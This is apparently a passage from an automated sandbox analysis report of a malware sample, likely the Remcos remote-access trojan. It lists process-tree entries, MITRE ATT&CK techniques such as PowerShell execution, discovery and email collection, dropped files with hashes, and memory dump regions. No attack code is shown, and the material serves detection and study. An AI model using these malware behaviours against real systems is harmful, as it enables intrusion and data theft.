        PID:1540
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc0c8446f8,0x7ffc0c844708,0x7ffc0c844718
        7⤵
        
        PID:5516
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5404

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2304

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3208

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
218B

MD5
b31cf4f7c44c6429a737ea3c48f8a765

SHA1
3b79fa12f7d3a9ffa5ef5910701be96fc6136754

SHA256
3d44a5a592434121ee0f1459e99833e966bbbbc6be7044af12d5b613eb321b30

SHA512
6b6d8809fd368e434d0155099e70362928f2e45ba86a53806188b2492ec02e15c489a648e31482c8a157e4b2a64db18c531f69b3307f77fadd4adb5031a91bf1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
36988ca14952e1848e81a959880ea217

SHA1
a0482ef725657760502c2d1a5abe0bb37aebaadb

SHA256
d7e96088b37cec1bde202ae8ec2d2f3c3aafc368b6ebd91b3e2985846facf2e6

SHA512
d04b2f5afec92eb3d9f9cdc148a3eddd1b615e0dfb270566a7969576f50881d1f8572bccb8b9fd7993724bdfe36fc7633a33381d43e0b96c4e9bbd53fc010173

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
fab8d8d865e33fe195732aa7dcb91c30

SHA1
2637e832f38acc70af3e511f5eba80fbd7461f2c

SHA256
1b034ffe38e534e2b7a21be7c1f207ff84a1d5f3893207d0b4bb1a509b4185ea

SHA512
39a3d43ef7e28fea2cb247a5d09576a4904a43680db8c32139f22a03d80f6ede98708a2452f3f82232b868501340f79c0b3f810f597bcaf5267c3ccfb1704b43

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000001

Filesize
67KB

MD5
fa476243c2b88901507afd738795ee1a

SHA1
557eab6bc1cf215f431b0b43b52a809553eed8d3

SHA256
df282a750d5d3ed30e234d7992f3aa7430274647625ad145a61d92cc118bd012

SHA512
33f2e36d6cce75c416dbca944257262e79bffebe10e62cd634ee66de8c815ca20ecb3fde8fc2d6f779c06518cf67032c9c098e6f064e654769d45c0c10e352f4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000002

Filesize
468KB

MD5
ac8f2c1efef05c19071621a92e54d32f

SHA1
dd61638e373d796c8ca2d6c9cc50f30fba088f43

SHA256
4b31a2c2141abdb557dd0684d322539a70880ad0e74ef5b582e0b8c449e021f9

SHA512
0832d64bdda1d1a9ca6678a105ea8a8470b58810f0ce2c95fda2b3d2bd4c5fbcb1b289b9f95025567a3920a9ecbc81feffdc69869b8a60fa9f09baab766c4236

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000003

Filesize
88KB

MD5
eb954771323a0888c9d94587e148ef49

SHA1
a12c902a3e0994ddea467afd3b71cd5c7ef57732

SHA256
2f30a1394e5448bc8523a7a9e46b772215031a8098d59f68740684d0d3f7e7a0

SHA512
5142d47952bcad42e3b6ab8d5b3c82bdcecc0cab5fa909e9c4154d8e7f9e96bfeb09522b4173db22f962a25824d8938dd66dd72409ed6b6df98dccb65ab86cad

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000004

Filesize
79KB

MD5
e51f388b62281af5b4a9193cce419941

SHA1
364f3d737462b7fd063107fe2c580fdb9781a45a

SHA256
348404a68791474349e35bd7d1980abcbf06db85132286e45ad4f204d10b5f2c

SHA512
1755816c26d013d7b610bab515200b0f1f2bd2be0c4a8a099c3f8aff2d898882fd3bcf1163d0378916f4c5c24222df5dd7b18df0c8e5bf2a0ebef891215f148e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000005

Filesize
34KB

MD5
522037f008e03c9448ae0aaaf09e93cb

SHA1
8a32997eab79246beed5a37db0c92fbfb006bef2

SHA256
983c35607c4fb0b529ca732be42115d3fcaac947cee9c9632f7cacdbdecaf5a7

SHA512
643ec613b2e7bdbb2f61e1799c189b0e3392ea5ae10845eb0b1f1542a03569e886f4b54d5b38af10e78db49c71357108c94589474b181f6a4573b86cf2d6f0d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000006

Filesize
17KB

MD5
240c4cc15d9fd65405bb642ab81be615

SHA1
5a66783fe5dd932082f40811ae0769526874bfd3

SHA256
030272ce6ba1beca700ec83fded9dbdc89296fbde0633a7f5943ef5831876c07

SHA512
267fe31bc25944dd7b6071c2c2c271ccc188ae1f6a0d7e587dcf9198b81598da6b058d1b413f228df0cb37c8304329e808089388359651e81b5f3dec566d0ee0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000007

Filesize
18KB

MD5
74f49bcdbd13777670657d78944e97f8

SHA1
862256addfc55950fa4b4da43e5619c24722bd31

SHA256
1f4aa7693f801ea02e189c3b85101e1a5c24ffd6c335d54d1b212f9981ea3f05

SHA512
c699383350446f3f665418edaf74e4e235532963801ce3c9fd57f49526aeb9b8fb6cb28fd9bb0a3e65a0521029b4d1821eade0e8a5d56eeafdca244650dd9f8d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000008

Filesize
259KB

MD5
34504ed4414852e907ecc19528c2a9f0

SHA1
0694ca8841b146adcaf21c84dedc1b14e0a70646

SHA256
c5327ac879b833d7a4b68e7c5530b2040d31e1e17c7a139a1fdd3e33f6102810

SHA512
173b454754862f7750eaef45d9acf41e9da855f4584663f42b67daed6f407f07497348efdfcf14feeeda773414081248fec361ac4d4206f1dcc283e6a399be2f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000009

Filesize
32KB

MD5
64d3be46eb793f6fe19bee805638cb80

SHA1
93bd75cf654214f8a76af8e1290499147d971c5c

SHA256
74c048fd2c6c9516438db1f627419a783622abcdc0522a5c4a1a568317a3d13c

SHA512
4646ac163dcc465669a868003b2667752eef8cad1f40dbff48c7f5d4c5f2120637f2514a0202f2008d52edfb377d1341d1b0411e556011ce9e2de194ee405908

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\0793827bfa8f5fd9_0

Filesize
188KB

MD5
6794abd50e613b6690bea5491338680a

SHA1
4a94d84c444352126c230082b4457d12fd9055f6

SHA256
5ecde4dc7716e4bc5bc0fd4bbf44ca24409f8301381b00d37602d29c606496da

SHA512
51d0399316fe8a9f2d267166e06f9d67b7807f1031e6e2395d4d983a11d5c3564cf1472aae36b41993aa83f597c8fa05a5ad125b3c582c7cabe6016b76294020

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\29fe91580c95497f_0

Filesize
295KB

MD5
5a17f4ffa964ef805f9194223346553a

SHA1
03e5e3bd750566317ce8b26aefb1b5430472769a

SHA256
929d7d7ff02595ffe5b17237f39efc7ea718ba9f9186149d70940a90f7bb06ee

SHA512
88546a493b8a2f7b897309d3dcfa1e55e9247de078f5c6803e906f45d2dbe8e337a22bae3357a92e5381bcfe3d019b2006d7306428a4422fca683903951443d4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\3ab592dde6ff023e_0

Filesize
272B

MD5
8db79c2e73ff0053f3fe9e2d423198df

SHA1
f6e320372f1f5abcc8cd4af0598c05f9e248997f

SHA256
c3857303368fab0063f3e8cd9022feb1d6f5f28e294370b282370dce137201e7

SHA512
4f28302187ab7ab2c7f26c1c1412f1a78f0df0a0f5c1df032930f334fceec4b0b56b5e49195f0082f98a5108836bb8f30abfef9077e55f56902ef257c735bb73

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\66c4493f385eb53f_0

Filesize
297B

MD5
09feb0944b8ce1d111c009177b1a44e9

SHA1
37c1798ddea5a4a4175cb5e986cbead4cd24e261

SHA256
3cf8aaeaa7c3fd23363b556677ba287f70bf8f6d9e7c0d7875b3d6280d357dcd

SHA512
979c045f89b7c38ef6fd2ff8fcd0529d577b268a0d36618ecf18bfe335cdd8b885aacdfe6b8c5b4b11ad7b9e129cb609372a5dca52edc94fe4b4362329d135d9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\67c896e8aae559d2_0

Filesize
291B

MD5
cc9ed64888d940b91a4c88aeab736ce8

SHA1
9224dbb5c23a3e4a1eb83c61040b12b461605e95

SHA256
cc083210c4349fc6c3bfa6c75aa2881fc311ecdaadf1defdb7d78dbe3f2a824a

SHA512
ca221e6e1feb83f9d5104fbe0db4e5c5cec35b1d9029f03a744c1d7b53da13730e0b79ca1d7ef0d9f53d37649a814d9a3825c052798760b9b963a78001a6c5dd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\9f4a2de96995a01c_0

Filesize
1.1MB

MD5
066eac112bb589af1e190ba72044f53d

SHA1
4eb73f0df624a9710eaa444f2c956c66f823ab16

SHA256
ec5720cc36bf6a6272371a8a8e0bc56b244e448ee0cba00aae8d3876b9b3eb8f

SHA512
de5fd75f08c637fc5a4197847cb3cbacf8e83f5a3e1b2509c43e2099d58585166a2857d6d6f62d9a008a1ad3b93e00d05330ad98973a198ca0d128f1d4751f32

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\a933f3951084e1eb_0

Filesize
1.3MB

MD5
04c6e75ea6e7e82310c76549d9fdf707

SHA1
051b9ce9043589ee31a0488516bc12e732c397b2

SHA256
55658794b620c4753bdbdf687b79d858f7a6686360d3290e4c60c39aff81f24a

SHA512
62c022747656b0503f7e01651dd36e0629ed5cfd5c3f68e3e7ee25b84f8d9075794130bc37710273646467f2d454c33d21e4ef6aed6d0f1d19365f7befa033f1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\caa455e3a2af4ec7_0

Filesize
1KB

MD5
81df2550725106321c1a8cac45d1f4f7

SHA1
b3b418f9150ccb527353928e184fd825a4691c2f

SHA256
69ce5411dc63e3e59fc0a715dc29cc0e971a748159ee861e95f114551ccbf9fc

SHA512
8d262ff450f3bcb219435898f5e1a68097a73c8a55a2857a37e37a8f96414dd8021ac196804d569968f175aa5ccc74e98d7f8103a7fac5dabbdcfef76ee23472

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\f29ed5b5251e1eaf_0

Filesize
269B

MD5
ffa7fd5c293dd6431995bb9790076c54

SHA1
d8eebd59e51ab02c12f9acc296a2478f67888649

SHA256
d47c57b6952f482f716d2c6d76a588d17c2f06485581534652c3e75c94c7af58

SHA512
7c626297fb2aebfa3c8c9c952e561d2c8a6b372ee74b72b342cbcafda0295426a5aa64cfec8ecc581ac887596cc9bfe1ea822090156aeffba89574c6c16935b9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
437B

MD5
05592d6b429a6209d372dba7629ce97c

SHA1
b4d45e956e3ec9651d4e1e045b887c7ccbdde326

SHA256
3aacb982b8861c38a392829ee3156d05dfdd46b0ecb46154f0ea9374557bc0fd

SHA512
caa85bdccabea9250e8a5291f987b8d54362a7b3eec861c56f79cebb06277aa35d411e657ec632079f46affd4d6730e82115e7b317fbda55dacc16378528abaa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
3e5d3f78bf21b3a9141cd5e34fd09134

SHA1
7fc36a04accddb3441a22bc77c21114312cab69c

SHA256
f18079fb8b5f0522fd34871583d8742053c314f3ef8f64588e18033d2f7cc017

SHA512
dcd10b31eadcdc678a62c3690587340afde0e0b9bffa7f8ec8753b29d6ec4b4f2b18d75596bb39d9b37d03dcfa3d4e8b7f81998702e2475b6113785ddfe6c00b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
207ba5ba8e0050eed7807db881abf070

SHA1
1bebfba1897fd76107a6266e30f2d357ac3c96f0

SHA256
9eee16eed6a723b121d1d9b86fa77ad38721b777a77faaf8e2c695f71814eb64

SHA512
4bfdec337ee218df1383da6906687e59e6835ef831bc15cbd7b7b250091f13f0e51c5b24c609cc7582985e8631c366646b44168b87c4fb8f9d06d41f2980c2e0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
e7127a499921772fd0255a0f3da29b59

SHA1
c1625dace5ee47cec9dde10412c3f421158737cc

SHA256
b5fccc360f2ef6aeab7eb7f7c60a5dd12327ed0af28bbad6eda588fe5528098a

SHA512
468b08acfa5aedfe56f18adc0ec583d2524c6cf30b63965b830c10ff72bf4ff17da9ed63b6c1bc63eed2357be50074900419c4a4ec92ad435abb8d15ab2cf04c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
14d02415198517b27ef564da76950a89

SHA1
e3f92c7b4c818621dda20b5c0f8509d909b4c446

SHA256
bb1ff315743cfc609921fb77a332d7904647c8455ceaf9d32a93320e092c5f94

SHA512
117741f0501fc7877cad7eb8d44731c39ae0a4495debf82ca4313c2c2fecb651a0bf0ac98c67f1f049597e15b8731fae844ecd5af27cec055ae8e5c8749a08b2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
39facd4b02b783af2d3ccc840c7a564c

SHA1
ae3874aaa5d6e0fb33085f84ffd64b9f0ab4cd3d

SHA256
72f5d80dfda95472dd04bf60f3dd46dd5466f7413877ed904938efc0257e3bc4

SHA512
59d23137489cefdd95e064d974a5f7a6e25d2657fdae0be4ddf5ad2860394755486d830f9f2f4db43f02fd91638008350eb53139f82909ea9fcfaeef865f45eb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
4e80995d908934d5d92754899dca3581

SHA1
6e96ea88efe435437ba53eaf96a4f122e4d7c779

SHA256
8ce5849424c37ea1bbee453326e7bd63dfd1fc97ff1d7a9abddabc4a40c0232a

SHA512
65c406fd75bbcb21acf245c44f26d7c0bbf2214d67ccf06886baf83c5b7584dc921d1777d1f96dcd9be853061ec424475103418ffd13f8cf3926149ebf6ad4b8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
3d588aebcf1fa846382550ed36888c5d

SHA1
e08a3ab925ca358f39b9644853d0a3a82131da0a

SHA256
f8eedfc93610423ec78dcb4cdc28db0bd4f56f182305cd5f89c87981aef4b5af

SHA512
efc8ec12190106a9b5a4dd0bd58288b514b62cd1de47add595eb811c6a9e9fdbd3dafc1cc50b8aabf7df6afae3e22ee17e7b06760ca239243ff9b973717ad1f5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
9738a27d62c28c52735d7a97bb21e7af

SHA1
cc404eb9cb9d482a513aadcdc7f48a225de63bf3

SHA256
4aab354c1f5cb26c483c04e201c90585b134a117ee688607da13d58f4d8ed1f0

SHA512
f2930ed8fbc4b2e85ab7a7e96ec8bfca1422db587e35b4b633c1d03a76dd8094a1aeea1a0036dd727778522d682bf14faae0898b452fb05c9e1d8d14df883758

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
ba750c744e03f072a05a93452c5a3247

SHA1
d64c90f75eccb9c6cf37f5c03736e9e83a1d8f27

SHA256
e87325a69150f58d0151df1caca614be0227831e71c1d05878ea93c38760617a

SHA512
596ffae4d7a61168425a984c84b9395fbf779c159b91ea552734b6640909f6afa1f327067a919cc6976b66f47eb998f3f7f3e9f583c2234511d6ffe48bcbd022

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
371B

MD5
2be711158bb02bb0c5b2b35b4bcf76ae

SHA1
25965ab768fee820645a482435e6740a5d7a49a8

SHA256
3301075cdc42f539b8c4c818a30cff61120dd74178781cee58254ab69b93a904

SHA512
7ea3dc19354a3219033bc4016b547b84b98011f9edee8608765e0a363637ee26c321490d73e5f9da6b9f40bbbf4d0f56c85ac30cf2dd771308081fcb08f70c32

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
371B

MD5
58503be0597155edd77762eb5bc49ea2

SHA1
f1a25f67ef8c886dab6631c22d955f00a8b65357

SHA256
68b0297cab74daf3534996a0aef7c8171e9ff921e980be2f19bc038ed1ba18e0

SHA512
02e20b596474367691755b46fc44f73e323173f92e776a25da40027b3a51e816c5b62fa7ecc4ebede0c904f4bc513b41d32ffd6410cf9d756a6e58edff60ce8c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
371B

MD5
36be348e50657e28ee313289b326a517

SHA1
12210057a217fb0b40a387b7964b8b5ee71ee9a1

SHA256
91cd83141f90417a38572850d41e42d726ad6ee64090f064707460ea4b406a60

SHA512
be12ac6fc3002fa22b4a7db87aa1865d177a5b9132df583cacb7dc7a0f90e5fae079bd25689a69357498ac3936457e9eff4608e5d83739efafd06a924b0db1e2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
371B

MD5
25a9584718f055a2e666622b7f921410

SHA1
ae069e3103bd7594c1b06b2570ccb67ced95969e

SHA256
63af402956e12f42be28fdcaadcdcd2784bdb6728659deefd8f54ca317ef0823

SHA512
39b9c577a1c81ded493bd9f44ed93425a717ef0171a4882762afab5baa010345f4e275880ff768b9d507f2f15083b81dae4994d5a4611e7eede7d2b391561efc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
371B

MD5
ec8f7ddaa46ea85cd35767e4bc5d01da

SHA1
203e90fa5a2f9383b048559fe2c436954b17b65e

SHA256
f69bb63de45e98523eef3ce6dc18bf05fb1f7c2a29d4b1d072d550dc7c12db27

SHA512
677516b7e7e66af4c63ade4981ede7ac33bf92a2dfe7cd65e03a7285d18ced5be1e63f50caa8ec9eebc7a1354cac1d3447022f647216428313d206b9d3698546

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
371B

MD5
5d53a8461b1b1307944f8f43411a9361

SHA1
07c809055f82fc0fa1c9da9f7ca174bda300cf9f

SHA256
3af9692a2d2875b7500ab802a456a8af972c36d45bd4d9ce4b8ecc75a43ce98d

SHA512
8fbcc7c61e21e42740f91cce4e821b18a8075b4918f0df2ffdf3ca22c4e0b2045bde01d6961a0a911e94a3b621a1bf4c51f5294e8760c07d26e19c2802ad4147

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe585b3a.TMP

Filesize
367B

MD5
005ae77e005cfb69bdae0f07f02298de

SHA1
6249807a37635d40e57f2ba5e7575a577f4ee485

SHA256
6adddb3008426683e740e0d386d708601db84c79432fdc8a7222241da50e34b1

SHA512
fb4cffbdcd2205ba7980f1f4158fea93309dbc63412a662f46e631b2e934fcfdc95de31687566cbd906f7bdc68293876aea42435c92b0313fd1755ba1dd2d93a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
6ec05dff5a6b1ce474a9b03520bce3a8

SHA1
25bb5d0f9580515f156758d4731989a2bdbedf59

SHA256
34e0c7af9b3c6a6489496cc541b2f2f07fe4b9771f9900b28acadd56eced9aae

SHA512
77c3a52bfb57005825a9a32cce94bd535b20e6a98f5b84e14745dc94f707d5d26a31520521ba720cbc1a71dfb339ecb9631d82e18a0de07d713322d7bd546780

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
77d622bb1a5b250869a3238b9bc1402b

SHA1
d47f4003c2554b9dfc4c16f22460b331886b191b

SHA256
f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

SHA512
d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
b837a040698c2e95d4005d130581aa28

SHA1
27b1c1caeac0a59199d904689396f3f5c8f2978a

SHA256
72c0954594e68b6756d4024aa3e45eb46d36d5fcbe03aca12cf4c0c3ed46f166

SHA512
f4d23beaf2785d62732c428a8fce0c24a4c23ac26d4502041d0b55848f8cde2e1f172904bf59bcf451a4d931254282e6760b3b6a1f038202e2c0126f0f8dca19

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hipntcnt.aww.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\rzlrxwoydgymxdiekznmgzcfufpsajwjz

Filesize
4KB

MD5
75379d3dcbcea6a69bc75b884816dd40

SHA1
7e073a03c3bdbbc60375ddbe56bba211c3d412a6

SHA256
cab559f3bbe4a0beb194dffca723b3072184b92687100462eaab04d66fff8de9

SHA512
710c2cee369a57a0039fc0d0c59de6118780210ef60ad0daf374f03ba94ab08039bc2aff821f7c99a0ecd0e16189c52e5b6d630b3d541f7b11375f134b985e8c

Download Submit
memory/212-479-0x0000000000BA0000-0x0000000000BAC000-memory.dmp

Filesize
48KB

Download
memory/628-125-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/628-124-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/628-123-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2616-36-0x0000016C7B660000-0x0000016C7BAA8000-memory.dmp

Filesize
4.3MB

Download
memory/2808-92-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/2808-85-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/2808-475-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/2808-817-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/2808-818-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/2808-296-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/2808-297-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/2808-73-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/2808-74-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/2808-83-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/2808-137-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/2808-476-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/2808-659-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/2808-658-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/2808-48-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/2808-37-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/2808-39-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/2808-106-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/2808-45-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/2808-42-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/3456-47-0x0000000000640000-0x000000000064C000-memory.dmp

Filesize
48KB

Download
memory/3620-157-0x0000000000700000-0x000000000070C000-memory.dmp

Filesize
48KB

Download
memory/3636-121-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/3636-118-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/3636-117-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/3672-262-0x0000000000E20000-0x0000000000E2C000-memory.dmp

Filesize
48KB

Download
memory/3872-592-0x0000000000A60000-0x0000000000A6C000-memory.dmp

Filesize
48KB

Download
memory/4300-120-0x0000000000400000-0x0000000000457000-memory.dmp

Filesize
348KB

Download
memory/4300-119-0x0000000000400000-0x0000000000457000-memory.dmp

Filesize
348KB

Download
memory/4300-122-0x0000000000400000-0x0000000000457000-memory.dmp

Filesize
348KB

Download
memory/4436-12-0x00007FFBFCCF0000-0x00007FFBFD7B1000-memory.dmp

Filesize
10.8MB

Download
memory/4436-16-0x00007FFBFCCF0000-0x00007FFBFD7B1000-memory.dmp

Filesize
10.8MB

Download
memory/4436-15-0x00007FFBFCCF0000-0x00007FFBFD7B1000-memory.dmp

Filesize
10.8MB

Download
memory/4436-13-0x00007FFBFCCF0000-0x00007FFBFD7B1000-memory.dmp

Filesize
10.8MB

Download
memory/4436-7-0x000001AB60730000-0x000001AB60752000-memory.dmp

Filesize
136KB

Download
memory/4436-1-0x00007FFBFCCF3000-0x00007FFBFCCF5000-memory.dmp

Filesize
8KB

Download
memory/5404-789-0x0000000000D30000-0x0000000000D3C000-memory.dmp

Filesize
48KB

Download
memory/5864-361-0x0000000000790000-0x000000000079C000-memory.dmp

Filesize
48KB

Download
memory/5944-689-0x0000000000C00000-0x0000000000C0C000-memory.dmp

Filesize
48KB

Download